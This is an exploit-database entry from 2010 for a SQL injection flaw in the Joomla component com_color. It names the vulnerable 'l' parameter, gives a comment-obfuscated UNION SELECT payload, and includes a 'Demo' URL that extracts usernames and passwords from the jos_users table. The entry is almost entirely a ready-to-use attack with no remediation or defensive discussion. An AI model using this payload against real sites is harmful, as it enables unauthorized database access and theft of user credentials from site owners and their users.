Joomla Component com_color SQL Injection Vulnerability

2010-03-12T00:00:00
ID 1337DAY-ID-11272
Type zdt
Reporter DevilZ TM
Modified 2010-03-12T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================
Joomla Component com_color SQL Injection Vulnerability 
======================================================

[~]######################################### ExploiT #################################################[~]
  
[~] Vulnerable File :
  
http://127.0.0.1/index.php?option=com_color&view=color&l=[SQL]
  
[~] ExploiT         :
  
-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**/FROM/**/jos_users/*
  
[~] Demo            :
 
http://server/index.php?option=com_color&view=color&l=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(username,0xa,password),6,7,8/**/FROM/**/jos_users/*



#  0day.today [2018-02-17]  #